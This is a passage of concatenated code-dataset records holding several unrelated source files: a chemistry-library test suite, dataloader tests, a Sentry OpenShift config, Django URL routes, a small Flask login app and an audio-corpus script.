that will be executed exactly once.\n :param object_id: The object id to train up.\n :param session_ids: A list of session ids that this model should be based on.\n :param observation_ids: A list of observation ids that will be dealt to the incremental model builder.\n :param submethod: A dictionary of discriminative parameters that will be used to initialize the\n training pipeline.\n :param pipeline_params: A dictionary of non-discriminative parameters that will be used to initialize the\n training pipeline.\n :param db_params: A DB parameters object that specifies where to save the model to.\n :param args: General command line args, for things like visualize or what have you.\n :returns: A plasm, 
only execute once please.\n '''\n from ecto_object_recognition.object_recognition_db import ModelWriter\n\n #todo make this depend on the pipeline specification or something...\n dealer = ObservationDealer(db_params=db_params, observation_ids=observation_ids)\n\n pipeline = cls()\n incremental_model_builder = pipeline.incremental_model_builder(submethod, pipeline_params, args)\n model_builder = ModelBuilder(source=dealer,\n incremental_model_builder=incremental_model_builder,\n niter=0,\n ) #execute until a quit condition occurs.\n post_process = pipeline.post_processor(submethod, pipeline_params, args)\n\n plasm = ecto.Plasm()\n # Connect the model builder to the source\n for key in set(model_builder.outputs.keys()).intersection(post_process.inputs.keys()):\n plasm.connect(model_builder[key] >> post_process[key])\n\n writer = ModelWriter(db_params=db_params,\n object_id=object_id,\n session_ids=list_to_cpp_json_str(session_ids),\n method=cls.type_name(),\n json_submethod=dict_to_cpp_json_str(submethod),\n json_parameters=dict_to_cpp_json_str(pipeline_params),\n )\n plasm.connect(post_process[\"db_document\"] >> writer[\"db_document\"])\n return plasm\n","sub_path":"python/object_recognition/pipelines/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":5834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"201617412","text":"import os.path\n\nCONF_ROOT = os.path.dirname(__file__)\n\n# For Sentry on Openshift, choose either mysql or postgresql_psycopg2 for ENGINE\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.\n 'NAME': os.environ['OPENSHIFT_APP_NAME'], # Or path to database file if using sqlite3.\n }\n}\n\ntry:\n env_db_name = {\n 'django.db.backends.mysql': 'MYSQL',\n 'django.db.backends.postgresql_psycopg2': 'POSTGRESQL'\n }[DATABASES['default']['ENGINE']]\nexcept KeyError:\n import sys\n 
sys.exit(\"Please set the database engine to django.db.backends.mysql or django.db.backends.postgresql_psycopg2 for this Sentry Openshift setup.\")\n\nDATABASES['default'].update({\n 'USER': os.environ['OPENSHIFT_%s_DB_USERNAME' % env_db_name ], # Not used with sqlite3.\n 'PASSWORD': os.environ['OPENSHIFT_%s_DB_PASSWORD' % env_db_name], # Not used with sqlite3.\n 'HOST': os.environ['OPENSHIFT_%s_DB_HOST' % env_db_name], # Set to empty string for localhost. Not used with sqlite3.\n 'PORT': os.environ['OPENSHIFT_%s_DB_PORT' % env_db_name], # Set to empty string for default. Not used with sqlite3.\n})\n\n\n# Edit this!\nSENTRY_KEY = 'super_secret_key'\n\n# Set this to false to require authentication\nSENTRY_PUBLIC = False\n\n# You should configure the absolute URI to Sentry. It will attempt to guess it if you don't\n# but proxies may interfere with this.\n# SENTRY_URL_PREFIX = 'http://sentry.example.com' # No trailing slash!\n\nSENTRY_WEB_HOST = os.environ['OPENSHIFT_INTERNAL_IP']\nSENTRY_WEB_PORT = os.environ['OPENSHIFT_INTERNAL_PORT']\nSENTRY_WEB_OPTIONS = {\n 'workers': 3, # the number of gunicorn workers\n # 'worker_class': 'gevent',\n 'daemon':True,\n 'pid': '%s/%s' % (os.environ['OPENSHIFT_DATA_DIR'],'gunicorn.pid'), # gunicorn pid file\n 'log-file': '%s/%s' % (os.environ['OPENSHIFT_DIY_LOG_DIR'],'gunicorn_out.log'), # gunicorn the Error log file\n #'access-logfile': '%s%s' % (os.environ['OPENSHIFT_DIY_LOG_DIR'],'gunicorn_access.log'), # gunicorn the Error log file\n\n}\n# Mail server configuration\n\n# For more information check Django's documentation:\n# https://docs.djangoproject.com/en/1.3/topics/email/?from=olddocs#e-mail-backends\n\nEMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\n\nEMAIL_HOST = 'localhost'\nEMAIL_HOST_PASSWORD = ''\nEMAIL_HOST_USER = ''\nEMAIL_PORT = 25\nEMAIL_USE_TLS = False\n\n# http://twitter.com/apps/new\n# It's important that input a callback URL, even if its useless. 
We have no idea why, consult Twitter.\nTWITTER_CONSUMER_KEY = ''\nTWITTER_CONSUMER_SECRET = ''\n\n# http://developers.facebook.com/setup/\nFACEBOOK_APP_ID = ''\nFACEBOOK_API_SECRET = ''\n\n# http://code.google.com/apis/accounts/docs/OAuth2.html#Registering\nGOOGLE_OAUTH2_CLIENT_ID = ''\nGOOGLE_OAUTH2_CLIENT_SECRET = ''\n\n# https://github.com/settings/applications/new\nGITHUB_APP_ID = ''\nGITHUB_API_SECRET = ''\n\n# https://trello.com/1/appKey/generate\nTRELLO_API_KEY = ''\nTRELLO_API_SECRET = ''\n","sub_path":"sentry.conf.py","file_name":"sentry.conf.py","file_ext":"py","file_size_in_byte":3044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"109014428","text":"\nfrom django.conf.urls import url, include\n\nfrom chat import views\n\n# API endpoints\n\nurlpatterns = [\n\turl(r'^$', views.api_root),\n\turl(r'^client/$', views.client, name='client'),\n\turl(r'^users/$', views.user_list, name='user-list'),\n\turl(r'^users/(?P[0-9]+)/$', views.user_del, name='user-del'),\n\turl(r'^messages/$', views.message_list, name='message-list'),\n\turl(r'^messages/history/$', views.message_history, name='message-history'),\n\n\turl(r'^messages/send$', views.send, name='send'),\n\turl(r'^messages/poll$', views.poll, name='poll'),\n\n]\n\nurlpatterns += [\n\turl(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework'))\n]","sub_path":"chat/urls_chat.py","file_name":"urls_chat.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"576922726","text":"# main site by flask\n\nfrom flask import Flask, render_template, request, url_for\nfrom login import login_check\n\napp = Flask(__name__, static_url_path='/static')\n\n# '/'\n# index.html\n@app.route('/')\ndef main_get(num=None):\n return render_template('index.html', num=num)\n\n\n# '/login'\n# check by hisnet_id, hisnet_pwd\n@app.route('/login', methods=['POST', 
'GET'])\ndef login(num=None):\n \n if request.method == 'GET':\n ## 넘겨받은 id&pwd\n id = request.args.get('id')\n pwd = request.args.get('pwd')\n\n ## 넘겨받은 값을 원래 페이지로 리다이렉트\n if login_check(request.args.get('id'), request.args.get('pwd')):\n return render_template('output.html', id = id, pwd = pwd, status = 'logged in')\n # return 'success'\n else:\n return render_template('output.html', id = id, pwd = pwd, status = 'log in fail')\n # return 'fail'\n \n # return render_template('login_test.html', id=temp, pwd=temp1)\n ## else 로 하지 않은 것은 POST, GET 이외에 다른 method로 넘어왔을 때를 구분하기 위함\n\n# '/table/'+hisnet_id # is it possible?\n# prints out the information from hisnet by the table\n\nif __name__ == '__main__':\n # threaded=True 로 넘기면 multiple plot이 가능해짐\n # app.run(debug=True, threaded=True\n app.run(host=\"0.0.0.0\", port=5000)\n\n","sub_path":"main/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"517756979","text":"import copy\n\nimport pytest\nfrom pytest_mock import mocker\nimport random\nimport operator\nfrom cotk.dataloader import SingleTurnDialog, OpenSubtitles\nfrom cotk.metric import MetricBase\n\nfrom version_test_base import base_test_version\n\n\ndef setup_module():\n\timport random\n\trandom.seed(0)\n\timport numpy as np\n\tnp.random.seed(0)\n\nclass TestSingleTurnDialog():\n\tdef base_test_init(self, dl):\n\t\tassert isinstance(dl, SingleTurnDialog)\n\t\tassert isinstance(dl.ext_vocab, list)\n\t\tassert dl.ext_vocab[:4] == [\"\", \"\", \"\", \"\"]\n\t\tassert [dl.pad_id, dl.unk_id, dl.go_id, dl.eos_id] == [0, 1, 2, 3]\n\t\tassert isinstance(dl.key_name, list)\n\t\tassert dl.key_name\n\t\tfor word in dl.key_name:\n\t\t\tassert isinstance(word, str)\n\t\tassert isinstance(dl.all_vocab_list, list)\n\t\tassert dl.vocab_list[:len(dl.ext_vocab)] == dl.ext_vocab\n\t\tassert isinstance(dl.word2id, dict)\n\t\tassert len(dl.word2id) == 
len(dl.all_vocab_list)\n\t\tassert dl.vocab_size == len(dl.vocab_list)\n\t\tfor i, word in enumerate(dl.all_vocab_list):\n\t\t\tassert isinstance(word, str)\n\t\t\tassert dl.word2id[word] == i\n\t\tassert dl.all_vocab_size == len(dl.all_vocab_list)\n\t\tfor key in dl.key_name:\n\t\t\tpost = dl.data[key]['post']\n\t\t\tresp = dl.data[key]['resp']\n\t\t\tassert len(post) == len(resp)\n\t\t\tassert isinstance(post[0], list)\n\t\t\tassert isinstance(resp[0], list)\n\t\t\tassert post[0][0] == dl.go_id\n\t\t\tassert post[0][-1] == dl.eos_id\n\t\t\tassert resp[0][0] == dl.go_id\n\t\t\tassert resp[0][-1] == dl.eos_id\n\n\t\t# assert the data has valid token\n\t\tassert dl.vocab_size > 4\n\t\t# assert the data has invalid token\n\t\tassert dl.all_vocab_size > dl.vocab_size\n\n\tdef base_test_all_unknown(self, dl):\n\t\t# if invalid_vocab_times very big, there is no invalid words.\n\t\tassert dl.vocab_size == dl.all_vocab_size\n\n\tdef base_test_restart(self, dl):\n\t\twith pytest.raises(ValueError):\n\t\t\tdl.restart(\"unknown set\")\n\t\tfor key in dl.key_name:\n\t\t\twith pytest.raises(ValueError):\n\t\t\t\tdl.restart(key)\n\t\t\trecord_index = copy.copy(dl.index[key])\n\t\t\tdl.restart(key, batch_size=3, shuffle=False)\n\t\t\tassert record_index == dl.index[key]\n\t\t\tassert dl.batch_id[key] == 0\n\t\t\tassert dl.batch_size[key] == 3\n\t\t\trng_state_st = random.getstate()\n\t\t\tdl.restart(key, shuffle=True)\n\t\t\trng_state_ed = random.getstate()\n\t\t\tassert operator.eq(rng_state_st, rng_state_ed)\t\t\t\n\t\t\tassert dl.batch_id[key] == 0\n\t\t\trecord_index = copy.copy(dl.index[key])\n\t\t\tdl.restart(key, shuffle=False)\n\t\t\tassert record_index == dl.index[key]\n\t\t\tassert dl.batch_id[key] == 0\n\n\tdef base_test_get_batch(self, dl):\n\t\twith pytest.raises(ValueError):\n\t\t\tdl.get_batch(\"unknown set\", [0, 1])\n\t\tfor key in dl.key_name:\n\t\t\twith pytest.raises(IndexError):\n\t\t\t\tlength = len(dl.data[key]['post'])\n\t\t\t\tdl.get_batch(key, 
[length-1, length])\n\t\t\tassert len(dl.index[key]) >= 2\n\t\t\tbatch = dl.get_batch(key, [0, 1])\n\t\t\tassert len(batch[\"post_length\"]) == 2\n\t\t\tassert len(batch[\"resp_length\"]) == 2\n\t\t\tassert batch[\"post\"].shape[0] == 2\n\t\t\tassert batch[\"resp\"].shape[0] == 2\n\n\t\t\tfor sent, length in [(\"post\", \"post_length\"), (\"resp\", \"resp_length\")]:\n\t\t\t\tfor idx in [0, 1]:\n\t\t\t\t\tif batch[length][idx] < batch[sent].shape[1]:\n\t\t\t\t\t\tassert batch[sent][idx][batch[length][idx]-1] == dl.eos_id\n\t\t\t\t\tassert batch[sent][idx][0] == dl.go_id\n\n\t\t# this is true, only when there is no unknown words in dl\n\t\t# (Only valid & invalid words)\n\t\tflag = False\n\t\tfor key in dl.key_name:\n\t\t\tlength = len(dl.data[key]['post'])\n\t\t\tfor i in range(length):\n\t\t\t\tbatch = dl.get_batch(key, [i])\n\t\t\t\tassert dl.unk_id not in batch[\"post_allvocabs\"]\n\t\t\t\tassert dl.unk_id not in batch[\"resp_allvocabs\"]\n\t\t\t\tbatch = dl.get_batch(key, [i])\n\t\t\t\tif dl.unk_id in batch[\"post\"] or \\\n\t\t\t\t\tdl.unk_id in batch[\"resp\"]:\n\t\t\t\t\tflag = True\n\t\tassert flag\n\n\tdef base_test_get_next_batch(self, dl):\n\t\twith pytest.raises(ValueError):\n\t\t\tdl.get_next_batch(\"unknown set\")\n\n\t\tfor key in dl.key_name:\n\t\t\twith pytest.raises(RuntimeError):\n\t\t\t\tdl.get_next_batch(key)\n\n\t\t\tdl.restart(key, 7)\n\t\t\tsample_num = 0\n\t\t\twhile True:\n\t\t\t\tbatch = dl.get_next_batch(key, ignore_left_samples=True)\n\t\t\t\tif not batch:\n\t\t\t\t\tbreak\n\t\t\t\tassert batch[\"post\"].shape[0] == 7\n\t\t\t\tsample_num += batch[\"post\"].shape[0]\n\t\t\tassert sample_num + 7 >= len(dl.data[key][\"post\"])\n\n\t\t\tdl.restart(key, 7)\n\t\t\tsample_num = 0\n\t\t\twhile True:\n\t\t\t\tbatch = dl.get_next_batch(key)\n\t\t\t\tassert batch is not None # dummy dataset must not be multiple of 7\n\t\t\t\tif batch[\"post\"].shape[0] == 7:\n\t\t\t\t\tsample_num += 7\n\t\t\t\telse:\n\t\t\t\t\tsample_num += 
batch[\"post\"].shape[0]\n\t\t\t\t\tbatch = dl.get_next_batch(key)\n\t\t\t\t\tassert not batch\n\t\t\t\t\tbreak\n\t\t\tassert sample_num == len(dl.data[key][\"post\"])\n\n\tdef base_test_convert(self, dl):\n\t\tsent_id = [0, 1, 2]\n\t\tsent = [\"\", \"\", \"\"]\n\t\tassert sent == dl.convert_ids_to_tokens(sent_id)\n\t\tassert sent_id == dl.convert_tokens_to_ids(sent)\n\n\t\tsent = [\"\", \"\", \"\", \"\", \"\", \"\"]\n\t\tsent_id = [1, 2, 0, 1, 0, 2]\n\t\tassert sent_id == dl.convert_tokens_to_ids(sent)\n\t\tassert sent_id == dl.convert_tokens_to_ids(sent, invalid_vocab=True)\n\n\t\tsent = [dl.all_vocab_list[dl.vocab_size]]\n\t\tassert [1] == dl.convert_tokens_to_ids(sent)\n\t\tassert [dl.vocab_size] == dl.convert_tokens_to_ids(sent, invalid_vocab=True)\n\n\n\t\tsent_id = [0, 1, 2, 0, 0, 3, 1, 0, 0]\n\t\tsent = [\"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\"]\n\t\tassert sent == dl.convert_ids_to_tokens(sent_id, trim=False)\n\t\tsent = [\"\", \"\", \"\"]\n\t\tassert sent == dl.convert_ids_to_tokens(sent_id)\n\n\t\tsent_id = [0, 0, 3]\n\t\tsent = [\"\", \"\", \"\"]\n\t\tassert sent == dl.convert_ids_to_tokens(sent_id, trim=False)\n\t\tassert not dl.convert_ids_to_tokens(sent_id)\n\n\t\tsent_id = [3, 3, 3]\n\t\tsent = [\"\", \"\", \"\"]\n\t\tassert sent == dl.convert_ids_to_tokens(sent_id, trim=False)\n\t\tassert not dl.convert_ids_to_tokens(sent_id)\n\n\t\tsent_id = [0, 0, 0]\n\t\tsent = [\"\", \"\", \"\"]\n\t\tassert sent == dl.convert_ids_to_tokens(sent_id, trim=False)\n\t\tassert not dl.convert_ids_to_tokens(sent_id)\n\n\tdef base_test_teacher_forcing_metric(self, dl):\n\t\tassert isinstance(dl.get_teacher_forcing_metric(), MetricBase)\n\n\tdef base_test_teacher_inference_metric(self, dl):\n\t\tassert isinstance(dl.get_inference_metric(), MetricBase)\n\n\tdef base_test_multi_runs(self, dl_list):\n\t\tassert all(x.vocab_list == dl_list[0].vocab_list for x in dl_list)\n\n@pytest.fixture\ndef load_opensubtitles():\n\tdef 
_load_opensubtitles(invalid_vocab_times=0):\n\t\treturn OpenSubtitles(\"./tests/dataloader/dummy_opensubtitles#OpenSubtitles\", invalid_vocab_times=invalid_vocab_times)\n\treturn _load_opensubtitles\n\nclass TestOpenSubtitles(TestSingleTurnDialog):\n\n\t@pytest.mark.dependency()\n\tdef test_init(self, load_opensubtitles):\n\t\tsuper().base_test_init(load_opensubtitles())\n\t\tsuper().base_test_all_unknown(load_opensubtitles(10000))\n\n\tdef test_restart(self, load_opensubtitles):\n\t\tsuper().base_test_restart(load_opensubtitles())\n\n\t@pytest.mark.dependency(depends=[\"TestOpenSubtitles::test_init\"])\n\tdef test_get_batch(self, load_opensubtitles):\n\t\tsuper().base_test_get_batch(load_opensubtitles())\n\n\t@pytest.mark.dependency(depends=[\"TestOpenSubtitles::test_init\"])\n\tdef test_get_next_batch(self, load_opensubtitles):\n\t\tsuper().base_test_get_next_batch(load_opensubtitles())\n\n\t@pytest.mark.dependency(depends=[\"TestOpenSubtitles::test_init\"])\n\tdef test_convert(self, load_opensubtitles):\n\t\tsuper().base_test_convert(load_opensubtitles())\n\n\tdef test_teacher_forcing_metric(self, load_opensubtitles):\n\t\tsuper().base_test_teacher_forcing_metric(load_opensubtitles())\n\n\tdef test_teacher_inference_metric(self, load_opensubtitles):\n\t\tsuper().base_test_teacher_inference_metric(load_opensubtitles())\n\n\tdef test_init_multi_runs(self, load_opensubtitles):\n\t\tsuper().base_test_multi_runs([load_opensubtitles() for i in range(3)])\n\n\nbase_test_version(OpenSubtitles)\n","sub_path":"tests/dataloader/test_single_turn_dialog.py","file_name":"test_single_turn_dialog.py","file_ext":"py","file_size_in_byte":7753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"128174892","text":"# Importing Dependencies \nimport csv\nimport os \nimport re\nimport json\nimport wave\nfrom numpy import random\nfrom sys import argv, exit\nfrom tqdm import tqdm\n\n# Function to calculate duration of audio file\ndef 
get_audio_duration(audio_path):\n audio = wave.open(audio_path)\n duration = float(audio.getnframes()) / audio.getframerate()\n audio.close()\n return duration\n\n# Main Function \ndef main(data_directory):\n # Open tsv file\n transcript_path = os.path.join(data_directory, \"utt_spk_text_clean.tsv\")\n transcript= open(transcript_path, \"r\")\n transcript_reader=csv.reader(transcript, delimiter=\"\\t\" )\n \n file_names=list()\n labels=list()\n\n # Check and drop lines containing numbers\n for row in transcript_reader:\n file_names.append(row[0])\n labels.append(row[2])\n\n transcript.close()\n\n # Bind file name and corresponding label\n zipped_list = list(zip(file_names, labels))\n sorted_zip = sorted(zipped_list, key = lambda x: x[0]) \n\n paths = list()\n texts = list()\n durations= list()\n\n for file_name, label in tqdm(sorted_zip):\n # For file name beginning with 0-7, Audio_0_7 directory \n if re.match(\"(^[0-7])\", file_name):\n audio_path=os.path.join(data_directory, \"Audio_0_7\", file_name+\".wav\")\n duration=get_audio_duration(audio_path)\n paths.append(audio_path)\n durations.append(duration)\n texts.append(label)\n # Else, directory Audio_8_f\n else:\n audio_path=os.path.join(data_directory,\"Audio_8_f\", file_name+\".wav\")\n duration=get_audio_duration(audio_path)\n paths.append(audio_path)\n durations.append(duration)\n texts.append(label)\n\n # Dump contents randomly into two json\n size = len(paths)\n print(size)\n \n fv = open(\"valid_corpus.json\", \"w\")\n ft = open(\"train_corpus.json\", \"w\")\n fm = open(\"main_corpus.json\", \"w\")\n threshold = int(0.2 * size)\n while(True):\n distribution = random.binomial(n=1, p=0.2, size=size)\n\n if list(distribution).count(1)==threshold:\n for index, value in enumerate(distribution):\n line = json.dumps({'key': paths[index],'duration':durations[index],'text': texts[index]}, ensure_ascii=False)\n fm.write(line+\"\\n\")\n if value==1:\n fv.write(line +\"\\n\")\n else:\n ft.write(line + \"\\n\")\n \n 
fv.close()\n ft.close()\n fm.close()\n break\n\n# Main function call\nif __name__ == \"__main__\":\n if len(argv) !=2:\n print(\"Error in command, exiting...\")\n exit()\n data_directory = argv[1]\n main(data_directory)\n\n","sub_path":"create_desc_json.py","file_name":"create_desc_json.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"337336928","text":"# -*- coding: utf-8 -*-\n\"\"\"Chemical Engineering Design Library (ChEDL). Utilities for process modeling.\nCopyright (C) 2020 Caleb Bell \n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\"\"\"\n\nfrom __future__ import division\nfrom thermo import *\nimport thermo\nfrom math import *\nfrom random import random\nfrom fluids.constants import *\nfrom fluids.numerics import assert_close, assert_close1d, assert_close2d, assert_close3d\nfrom numpy.testing import assert_allclose\nfrom chemicals import normalize\nfrom thermo.test_utils import check_np_output_activity\n\nimport pytest\ntry:\n import numba\n import thermo.numba\n import numba.core\nexcept:\n numba = None\nimport numpy as np\n\n\ndef swap_funcs_and_test(names, substitutions, test):\n '''\n names : list[str]\n object names to switch out\n substitutions : list[obj]\n Objects to put in\n test : function\n Unit test to run in the file\n '''\n originals = {}\n glob = test.__globals__\n for name, sub in zip(names, substitutions):\n originals[name] = glob[name]\n glob[name] = sub\n try:\n test()\n except Exception as e:\n glob.update(originals)\n raise e\n glob.update(originals)\n\ndef mark_as_numba(func):\n func = pytest.mark.numba(func)\n func = pytest.mark.skipif(numba is None, reason=\"Numba is missing\")(func)\n return func\n\n@mark_as_numba\ndef test_PRMIX_outputs_inputs_np():\n kwargs = dict(Tcs=[190.56400000000002, 305.32, 369.83, 126.2],\n Pcs=[4599000.0, 4872000.0, 4248000.0, 3394387.5],\n omegas=[0.008, 0.098, 0.152, 0.04],\n zs=[.1, .2, .3, .4],\n kijs=[[0.0, -0.0059, 0.0119, 0.0289], [-0.0059, 0.0, 0.0011, 0.0533], [0.0119, 0.0011, 0.0, 0.0878], [0.0289, 0.0533, 0.0878, 0.0]])\n kwargs_np = {k:np.array(v) for k, v in kwargs.items()}\n\n from thermo.numba import PRMIX as PRMIXNP\n\n eos = PRMIX(T=200, P=1e5, **kwargs)\n eos_np = PRMIXNP(T=200, P=1e5, **kwargs_np)\n\n base_vec_attrs = ['a_alphas', 'da_alpha_dTs', 
'd2a_alpha_dT2s', 'a_alpha_roots', 'a_alpha_j_rows', 'da_alpha_dT_j_rows', 'lnphis_l', 'phis_l', 'fugacities_l', 'lnphis_g', 'phis_g', 'fugacities_g']\n extra_vec_attrs = ['db_dzs', 'db_dns', 'dnb_dns', 'd2b_dzizjs', 'd2b_dninjs', 'd3b_dzizjzks', 'd3b_dninjnks', 'd3epsilon_dzizjzks', 'da_alpha_dzs', 'da_alpha_dns', 'dna_alpha_dns', 'd2a_alpha_dzizjs']\n alpha_vec_attrs = ['_a_alpha_j_rows', '_da_alpha_dT_j_rows', 'a_alpha_ijs', 'da_alpha_dT_ijs', 'd2a_alpha_dT2_ijs']\n # TODO: _d2a_alpha_dT2_j_rows, and _a_alpha_j_rows', '_da_alpha_dT_j_rows with .to methods\n\n for attr in base_vec_attrs + extra_vec_attrs + alpha_vec_attrs:\n assert_close1d(getattr(eos, attr), getattr(eos_np, attr), rtol=1e-14)\n assert type(getattr(eos, attr)) is list\n assert type(getattr(eos_np, attr)) is np.ndarray\n\n\ndef test_IdealSolution_np_out():\n from thermo import IdealSolution\n from thermo.numba import IdealSolution as IdealSolutionnp\n model = IdealSolution(T=300.0, xs=[.1, .2, .3, .4])\n modelnp = IdealSolutionnp(T=300.0, xs=np.array([.1, .2, .3, .4]))\n modelnp2 = modelnp.to_T_xs(T=310.0, xs=np.array([.2, .2, .2, .4]))\n\n check_np_output_activity(model, modelnp, modelnp2)\n\n\ndef test_Wilson_numpy_output():\n T = 331.42\n N = 3\n\n from thermo.numba import Wilson as Wilsonnp\n A = [[0.0, 3.870101271243586, 0.07939943395502425],\n [-6.491263271243587, 0.0, -3.276991837288562],\n [0.8542855660449756, 6.906801837288562, 0.0]]\n B = [[0.0, -375.2835, -31.1208],\n [1722.58, 0.0, 1140.79],\n [-747.217, -3596.17, -0.0]]\n D = [[-0.0, -0.00791073, -0.000868371],\n [0.00747788, -0.0, -3.1e-05],\n [0.00124796, -3e-05, -0.0]]\n\n C = E = F = [[0.0]*N for _ in range(N)]\n\n xs = [0.229, 0.175, 0.596]\n\n model = thermo.wilson.Wilson(T=T, xs=xs, ABCDEF=(A, B, C, D, E, F))\n modelnp = Wilsonnp(T=T, xs=np.array(xs), ABCDEF=(np.array(A), np.array(B), np.array(C), np.array(D), np.array(E), np.array(F)))\n modelnp2 = modelnp.to_T_xs(T=T, xs=np.array(xs))\n\n check_np_output_activity(model, 
modelnp, modelnp2)\n\ndef test_NRTL_numpy_output():\n NRTLnp = thermo.numba.nrtl.NRTL\n alphas = [[[0.0, 2e-05], [0.2937, 7e-05], [0.2999, 0.0001]],\n [[0.2937, 1e-05], [0.0, 4e-05], [0.3009, 8e-05]],\n [[0.2999, 1e-05], [0.3009, 3e-05], [0.0, 5e-05]]]\n\n taus = [[[6e-05, 0.0, 7e-05, 7e-05, 0.00788, 3.6e-07],\n [3e-05, 624.868, 9e-05, 7e-05, 0.00472, 8.5e-07],\n [3e-05, 398.953, 4e-05, 1e-05, 0.00279, 5.6e-07]],\n [[1e-05, -29.167, 8e-05, 9e-05, 0.00256, 1e-07],\n [2e-05, 0.0, 7e-05, 6e-05, 0.00587, 4.2e-07],\n [0.0, -35.482, 8e-05, 4e-05, 0.00889, 8.2e-07]],\n [[9e-05, -95.132, 6e-05, 1e-05, 0.00905, 5.2e-07],\n [9e-05, 33.862, 2e-05, 6e-05, 0.00517, 1.4e-07],\n [0.0001, 0.0, 6e-05, 2e-05, 0.00095, 7.4e-07]]]\n\n N = 3\n T = 273.15+70\n dT = T*1e-8\n xs = [.2, .3, .5]\n model = NRTL(T, xs, taus, alphas)\n modelnp = NRTLnp(T=T, xs=np.array(xs), tau_coeffs=np.array(taus), alpha_coeffs=np.array(alphas))\n modelnp2 = modelnp.to_T_xs(T=T, xs=np.array(xs))\n\n check_np_output_activity(model, modelnp, modelnp2)\n\ndef test_UNIQUAC_numpy_output():\n UNIQUACnp = thermo.numba.uniquac.UNIQUAC\n\n N = 3\n T = 331.42\n xs = [0.229, 0.175, 0.596]\n rs = [2.5735, 2.87, 1.4311]\n qs = [2.336, 2.41, 1.432]\n # madeup numbers to match Wilson example roughly\n tausA = [[0.0, -1.05e-4, -2.5e-4], [3.9e-4, 0.0, 1.6e-4], [-1.123e-4, 6.5e-4, 0]]\n tausB = [[0.0, 235.0, -169.0], [-160, 0.0, -715.0], [11.2, 144.0, 0.0]]\n tausC = [[0.0, -4.23e-4, 2.9e-4], [6.1e-4, 0.0, 8.2e-5], [-7.8e-4, 1.11e-4, 0]]\n tausD = [[0.0, -3.94e-5, 2.22e-5], [8.5e-5, 0.0, 4.4e-5], [-7.9e-5, 3.22e-5, 0]]\n tausE = [[0.0, -4.2e2, 8.32e2], [2.7e2, 0.0, 6.8e2], [3.7e2, 7.43e2, 0]]\n tausF = [[0.0, 9.64e-8, 8.94e-8], [1.53e-7, 0.0, 1.11e-7], [7.9e-8, 2.276e-8, 0]]\n ABCDEF = (tausA, tausB, tausC, tausD, tausE, tausF)\n ABCDEFnp = tuple(np.array(v) for v in ABCDEF)\n\n model = UNIQUAC(T=T, xs=xs, rs=rs, qs=qs, ABCDEF=ABCDEF)\n modelnp = UNIQUACnp(T=T, xs=np.array(xs), rs=np.array(rs), qs=np.array(qs), 
ABCDEF=ABCDEFnp)\n modelnp2 = modelnp.to_T_xs(T=T, xs=np.array(xs))\n\n check_np_output_activity(model, modelnp, modelnp2)\n\n@mark_as_numba\ndef test_UNIFAC_numpy_output():\n from thermo.unifac import DOUFIP2006, DOUFSG\n\n UNIFACnp = thermo.numba.unifac.UNIFAC\n N = 4\n T = 373.15\n xs = [0.2, 0.3, 0.1, 0.4]\n chemgroups = [{9:6}, {78:6}, {1:1, 18:1}, {1:1, 2:1, 14:1}]\n model = thermo.unifac.UNIFAC.from_subgroups(T=T, xs=xs, chemgroups=chemgroups, version=1,\n interaction_data=DOUFIP2006, subgroups=DOUFSG)\n\n\n modelnp = UNIFACnp.from_subgroups(T=T, xs=np.array(xs), chemgroups=chemgroups, version=1,\n interaction_data=DOUFIP2006, subgroups=DOUFSG)\n modelnp2 = modelnp.to_T_xs(T=T, xs=np.array(xs))\n\n check_np_output_activity(model, modelnp, modelnp2)\n\n json_string = modelnp.as_json()\n new = UNIFACnp.from_json(json_string)\n assert new == modelnp\n\n\n\n\n@mark_as_numba\ndef test_a_alpha_aijs_composition_independent_in_all():\n assert 'a_alpha_aijs_composition_independent' in thermo.numba.__all__\n\n\n@mark_as_numba\ndef test_a_alpha_aijs_composition_independent():\n # TODO: a_alpha_aijs_composition_independent is being overwritten in thermo.numba somehow!\n\n kijs = np.array([[0,.083],[0.083,0]])\n a_alphas = np.array([0.2491099357671155, 0.6486495863528039])\n a0, a1, a2 = thermo.numba.eos_mix_methods.a_alpha_aijs_composition_independent(a_alphas, kijs)\n assert type(a0) is np.ndarray\n assert type(a1) is np.ndarray\n assert type(a2) is np.ndarray\n\n b0, b1, b2 = thermo.eos_mix_methods.a_alpha_aijs_composition_independent(a_alphas, kijs)\n assert_close1d(a1, b1, rtol=1e-13)\n assert_close2d(a0, b0, rtol=1e-13)\n assert_close2d(a2, b2, rtol=1e-13)\n\n assert 